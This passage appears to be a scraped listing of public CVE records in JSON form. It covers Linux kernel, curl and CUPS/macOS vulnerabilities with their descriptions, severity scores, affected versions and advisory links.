{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:32:46.345Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2173430" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/?id=458e279f861d3f61796894cd158b780765a1569f" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2023/01/23/1" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "name": "[oss-security] 20231105 Re: Linux Kernel: sctp: KASLR leak in inet_diag_msg_sctpasoc_fill()", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/11/05/4" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "unknown" } ] } ], "descriptions": [ { "lang": "en", "value": "A memory leak flaw was found in the Linux kernel\u0027s Stream Control Transmission Protocol. This issue may occur when a user starts a malicious networking service and someone connects to this service. This could allow a local user to starve resources, causing a denial of service." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-401", "description": "CWE-401", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-05T21:06:14.461370", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2173430" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/?id=458e279f861d3f61796894cd158b780765a1569f" }, { "url": "https://www.openwall.com/lists/oss-security/2023/01/23/1" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "name": "[oss-security] 20231105 Re: Linux Kernel: sctp: KASLR leak in inet_diag_msg_sctpasoc_fill()", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2023/11/05/4" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1074", "datePublished": "2023-03-27T00:00:00", "dateReserved": "2023-02-27T00:00:00", "dateUpdated": "2024-08-02T05:32:46.345Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-3611
Vulnerability from cvelistv5
Published
2023-07-21 20:49
Modified
2024-09-27 13:43
Severity ?
EPSS score ?
Summary
Out-of-bounds write in Linux kernel's net/sched: sch_qfq component
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:01:57.288Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e337087c3b5805fe0b8a46ba622a962880b5d64" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/3e337087c3b5805fe0b8a46ba622a962880b5d64" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230908-0002/" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5492" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" }, { "affected": [ { "cpes": [ "cpe:2.3:o:linux:kernel:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "kernel", "vendor": "linux", "versions": [ { "lessThan": "6.5", "status": "affected", "version": "3.8", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2023-3611", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-09-27T13:33:11.602895Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-09-27T13:43:55.993Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.5", "status": "affected", "version": "3.8", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Lion" } ], "datePublic": "2023-07-13T09:11:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cp\u003eAn out-of-bounds write vulnerability in the Linux kernel\u0027s net/sched: sch_qfq component can be exploited to achieve local privilege escalation.\u003c/p\u003e\u003cp\u003eThe qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.\u003c/p\u003e\u003cp\u003eWe recommend upgrading past commit 3e337087c3b5805fe0b8a46ba622a962880b5d64.\u003c/p\u003e" } ], "value": "An out-of-bounds write vulnerability in the Linux kernel\u0027s net/sched: sch_qfq component can be exploited to achieve local privilege escalation.\n\nThe qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.\n\nWe recommend upgrading past commit 3e337087c3b5805fe0b8a46ba622a962880b5d64.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "CWE-787 Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-07-22T09:43:12.163Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e337087c3b5805fe0b8a46ba622a962880b5d64" }, { "url": "https://kernel.dance/3e337087c3b5805fe0b8a46ba622a962880b5d64" }, { "url": "https://www.debian.org/security/2023/dsa-5480" }, { "url": "https://security.netapp.com/advisory/ntap-20230908-0002/" }, { "url": "https://www.debian.org/security/2023/dsa-5492" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Out-of-bounds write in Linux kernel\u0027s net/sched: sch_qfq component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-3611", "datePublished": "2023-07-21T20:49:10.812Z", "dateReserved": "2023-07-10T20:52:55.365Z", "dateUpdated": "2024-09-27T13:43:55.993Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-28322
Vulnerability from cvelistv5
Published
2023-05-26 00:00
Modified
2024-08-02 12:38
Severity ?
EPSS score ?
Summary
An information disclosure vulnerability exists in curl <v8.1.0 when doing HTTP(S) transfers, libcurl might erroneously use the read callback (`CURLOPT_READFUNCTION`) to ask for data to send, even when the `CURLOPT_POSTFIELDS` option has been set, if the same handle previously wasused to issue a `PUT` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the second transfer. The problem exists in the logic for a reused handle when it is (expected to be) changed from a PUT to a POST.
References
Impacted products
▼ | Vendor | Product |
---|---|---|
n/a | https://github.com/curl/curl |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T12:38:25.091Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://hackerone.com/reports/1954658" }, { "name": "FEDORA-2023-37eac50e9b", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F4I75RDGX5ULSSCBE5BF3P5I5SFO7ULQ/" }, { "name": "FEDORA-2023-8ed627bb04", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z2LIWHWKOVH24COGGBCVOWDXXIUPKOMK/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230609-0009/" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT213843" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT213844" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT213845" }, { "name": "20230725 APPLE-SA-2023-07-24-6 macOS Big Sur 11.7.9", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/52" }, { "name": "20230725 APPLE-SA-2023-07-24-5 macOS Monterey 12.6.8", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/48" }, { "name": "20230725 APPLE-SA-2023-07-24-4 macOS Ventura 13.5", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/47" }, { "name": "GLSA-202310-12", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202310-12" }, { "name": "[debian-lts-announce] 20231222 [SECURITY] [DLA 3692-1] curl security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00015.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "https://github.com/curl/curl", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in 8.1.0" } ] } ], "descriptions": [ { "lang": "en", "value": "An information disclosure vulnerability exists in curl \u003cv8.1.0 when doing HTTP(S) transfers, libcurl might erroneously use the read callback (`CURLOPT_READFUNCTION`) to ask for data to send, even when the `CURLOPT_POSTFIELDS` option has been set, if the same handle previously wasused to issue a `PUT` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the second transfer. The problem exists in the logic for a reused handle when it is (expected to be) changed from a PUT to a POST." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-200", "description": "Information Disclosure (CWE-200)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-22T16:06:14.746366", "orgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1", "shortName": "hackerone" }, "references": [ { "url": "https://hackerone.com/reports/1954658" }, { "name": "FEDORA-2023-37eac50e9b", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F4I75RDGX5ULSSCBE5BF3P5I5SFO7ULQ/" }, { "name": "FEDORA-2023-8ed627bb04", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z2LIWHWKOVH24COGGBCVOWDXXIUPKOMK/" }, { "url": "https://security.netapp.com/advisory/ntap-20230609-0009/" }, { "url": "https://support.apple.com/kb/HT213843" }, { "url": "https://support.apple.com/kb/HT213844" }, { "url": "https://support.apple.com/kb/HT213845" }, { "name": "20230725 APPLE-SA-2023-07-24-6 macOS Big Sur 11.7.9", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/52" }, { "name": "20230725 APPLE-SA-2023-07-24-5 macOS Monterey 12.6.8", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/48" }, { "name": "20230725 APPLE-SA-2023-07-24-4 macOS Ventura 13.5", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2023/Jul/47" }, { "name": "GLSA-202310-12", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202310-12" }, { "name": "[debian-lts-announce] 20231222 [SECURITY] [DLA 3692-1] curl security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00015.html" } ] } }, "cveMetadata": { "assignerOrgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1", "assignerShortName": "hackerone", "cveId": "CVE-2023-28322", "datePublished": "2023-05-26T00:00:00", "dateReserved": "2023-03-14T00:00:00", "dateUpdated": "2024-08-02T12:38:25.091Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-26691
Vulnerability from cvelistv5
Published
2022-05-26 17:47
Modified
2024-08-03 05:11
Severity ?
EPSS score ?
Summary
A logic issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Monterey 12.3, macOS Big Sur 11.6.5. An application may be able to gain elevated privileges.
References
▼ | URL | Tags |
---|---|---|
https://support.apple.com/en-us/HT213183 | x_refsource_MISC | |
https://support.apple.com/en-us/HT213184 | x_refsource_MISC | |
https://support.apple.com/en-us/HT213185 | x_refsource_MISC | |
https://lists.debian.org/debian-lts-announce/2022/05/msg00039.html | mailing-list, x_refsource_MLIST | |
https://www.debian.org/security/2022/dsa-5149 | vendor-advisory, x_refsource_DEBIAN | |
https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2022/MNDT-2022-0026/MNDT-2022-0026.md | x_refsource_MISC | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KQ6TD7F3VRITPEHFDHZHK7MU6FEBMZ5U/ | vendor-advisory, x_refsource_FEDORA | |
https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444 | x_refsource_MISC | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YQRIT4H75XV6M42K7ZTARWZ7YLLYQHPO/ | vendor-advisory, x_refsource_FEDORA |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T05:11:44.807Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/en-us/HT213183" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/en-us/HT213184" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/en-us/HT213185" }, { "name": "[debian-lts-announce] 20220527 [SECURITY] [DLA 3029-1] cups security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00039.html" }, { "name": "DSA-5149", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5149" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2022/MNDT-2022-0026/MNDT-2022-0026.md" }, { "name": "FEDORA-2022-09a89bc265", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KQ6TD7F3VRITPEHFDHZHK7MU6FEBMZ5U/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444" }, { "name": "FEDORA-2022-39e057bc6d", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YQRIT4H75XV6M42K7ZTARWZ7YLLYQHPO/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "macOS", "vendor": "Apple", "versions": [ { "lessThan": "12.3", "status": "affected", "version": "unspecified", "versionType": "custom" } ] }, { "product": "macOS", "vendor": "Apple", "versions": [ { "lessThan": "11.6", "status": "affected", "version": "unspecified", "versionType": "custom" } ] }, { "product": "macOS", "vendor": "Apple", "versions": [ { "lessThan": "2022", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A logic issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Monterey 12.3, macOS Big Sur 11.6.5. An application may be able to gain elevated privileges." } ], "problemTypes": [ { "descriptions": [ { "description": "An application may be able to gain elevated privileges", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-06-16T03:06:13", "orgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "shortName": "apple" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/en-us/HT213183" }, { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/en-us/HT213184" }, { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/en-us/HT213185" }, { "name": "[debian-lts-announce] 20220527 [SECURITY] [DLA 3029-1] cups security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00039.html" }, { "name": "DSA-5149", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5149" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2022/MNDT-2022-0026/MNDT-2022-0026.md" }, { "name": "FEDORA-2022-09a89bc265", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KQ6TD7F3VRITPEHFDHZHK7MU6FEBMZ5U/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444" }, { "name": "FEDORA-2022-39e057bc6d", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YQRIT4H75XV6M42K7ZTARWZ7YLLYQHPO/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "product-security@apple.com", "ID": "CVE-2022-26691", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "macOS", "version": { "version_data": [ { "version_affected": "\u003c", "version_value": "12.3" } ] } }, { "product_name": "macOS", "version": { "version_data": [ { "version_affected": "\u003c", "version_value": "11.6" } ] } }, { "product_name": "macOS", "version": { "version_data": [ { "version_affected": "\u003c", "version_value": "2022" } ] } } ] }, "vendor_name": "Apple" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A logic issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Monterey 12.3, macOS Big Sur 11.6.5. An application may be able to gain elevated privileges." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "An application may be able to gain elevated privileges" } ] } ] }, "references": { "reference_data": [ { "name": "https://support.apple.com/en-us/HT213183", "refsource": "MISC", "url": "https://support.apple.com/en-us/HT213183" }, { "name": "https://support.apple.com/en-us/HT213184", "refsource": "MISC", "url": "https://support.apple.com/en-us/HT213184" }, { "name": "https://support.apple.com/en-us/HT213185", "refsource": "MISC", "url": "https://support.apple.com/en-us/HT213185" }, { "name": "[debian-lts-announce] 20220527 [SECURITY] [DLA 3029-1] cups security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00039.html" }, { "name": "DSA-5149", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5149" }, { "name": "https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2022/MNDT-2022-0026/MNDT-2022-0026.md", "refsource": "MISC", "url": "https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2022/MNDT-2022-0026/MNDT-2022-0026.md" }, { "name": "FEDORA-2022-09a89bc265", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KQ6TD7F3VRITPEHFDHZHK7MU6FEBMZ5U/" }, { "name": "https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444", "refsource": "MISC", "url": "https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444" }, { "name": "FEDORA-2022-39e057bc6d", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YQRIT4H75XV6M42K7ZTARWZ7YLLYQHPO/" } ] } } } }, "cveMetadata": { "assignerOrgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "assignerShortName": "apple", "cveId": "CVE-2022-26691", "datePublished": "2022-05-26T17:47:59", "dateReserved": "2022-03-08T00:00:00", "dateUpdated": "2024-08-03T05:11:44.807Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-46218
Vulnerability from cvelistv5
Published
2023-12-07 01:10
Modified
2024-08-02 20:37
Severity ?
EPSS score ?
Summary
This flaw allows a malicious HTTP server to set "super cookies" in curl that
are then passed back to more origins than what is otherwise allowed or
possible. This allows a site to set cookies that then would get sent to
different and unrelated sites and domains.
It could do this by exploiting a mixed case flaw in curl's function that
verifies a given cookie domain against the Public Suffix List (PSL). For
example a cookie could be set with `domain=co.UK` when the URL used a lower
case hostname `curl.co.uk`, even though `co.uk` is listed as a PSL domain.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:37:40.148Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://hackerone.com/reports/2212193" }, { "tags": [ "x_transferred" ], "url": "https://curl.se/docs/CVE-2023-46218.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3ZX3VW67N4ACRAPMV2QS2LVYGD7H2MVE/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UOGXU25FMMT2X6UUITQ7EZZYMJ42YWWD/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00015.html" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5587" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240125-0007/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "curl", "vendor": "curl", "versions": [ { "lessThanOrEqual": "8.4.0", "status": "affected", "version": "8.4.0", "versionType": "semver" }, { "lessThan": "7.46.0", "status": "unaffected", "version": "7.46.0", "versionType": "semver" } ] } ], "descriptions": [ { "lang": "en", "value": "This flaw allows a malicious HTTP server to set \"super cookies\" in curl that\nare then passed back to more origins than what is otherwise allowed or\npossible. This allows a site to set cookies that then would get sent to\ndifferent and unrelated sites and domains.\n\nIt could do this by exploiting a mixed case flaw in curl\u0027s function that\nverifies a given cookie domain against the Public Suffix List (PSL). For\nexample a cookie could be set with `domain=co.UK` when the URL used a lower\ncase hostname `curl.co.uk`, even though `co.uk` is listed as a PSL domain.\n" } ], "providerMetadata": { "dateUpdated": "2023-12-07T01:10:34.846Z", "orgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1", "shortName": "hackerone" }, "references": [ { "url": "https://hackerone.com/reports/2212193" }, { "url": "https://curl.se/docs/CVE-2023-46218.html" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3ZX3VW67N4ACRAPMV2QS2LVYGD7H2MVE/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UOGXU25FMMT2X6UUITQ7EZZYMJ42YWWD/" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00015.html" }, { "url": "https://www.debian.org/security/2023/dsa-5587" }, { "url": "https://security.netapp.com/advisory/ntap-20240125-0007/" } ] } }, "cveMetadata": { "assignerOrgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1", "assignerShortName": "hackerone", "cveId": "CVE-2023-46218", "datePublished": "2023-12-07T01:10:34.846Z", "dateReserved": "2023-10-19T01:00:12.854Z", "dateUpdated": "2024-08-02T20:37:40.148Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-23455
Vulnerability from cvelistv5
Published
2023-01-12 00:00
Modified
2024-08-02 10:28
Severity ?
EPSS score ?
Summary
atm_tc_enqueue in net/sched/sch_atm.c in the Linux kernel through 6.1.4 allows attackers to cause a denial of service because of type confusion (non-negative numbers can sometimes indicate a TC_ACT_SHOT condition rather than valid classification results).
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T10:28:40.920Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2023/01/10/1" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2023/01/10/4" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a2965c7be0522eaa18808684b7b82b248515511b" }, { "name": "DSA-5324", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "atm_tc_enqueue in net/sched/sch_atm.c in the Linux kernel through 6.1.4 allows attackers to cause a denial of service because of type confusion (non-negative numbers can sometimes indicate a TC_ACT_SHOT condition rather than valid classification results)." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://www.openwall.com/lists/oss-security/2023/01/10/1" }, { "url": "https://www.openwall.com/lists/oss-security/2023/01/10/4" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a2965c7be0522eaa18808684b7b82b248515511b" }, { "name": "DSA-5324", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-23455", "datePublished": "2023-01-12T00:00:00", "dateReserved": "2023-01-12T00:00:00", "dateUpdated": "2024-08-02T10:28:40.920Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1079
Vulnerability from cvelistv5
Published
2023-03-27 00:00
Modified
2024-08-02 05:32
Severity ?
EPSS score ?
Summary
A flaw was found in the Linux kernel. A use-after-free may be triggered in asus_kbd_backlight_set when plugging/disconnecting in a malicious USB device, which advertises itself as an Asus device. Similarly to the previous known CVE-2023-25012, but in asus devices, the work_struct may be scheduled by the LED controller while the device is disconnecting, triggering a use-after-free on the struct asus_kbd_leds *led structure. A malicious USB device may exploit the issue to cause memory corruption with controlled data.
References
Impacted products
▼ | Vendor | Product |
---|---|---|
n/a | Linux kernel |
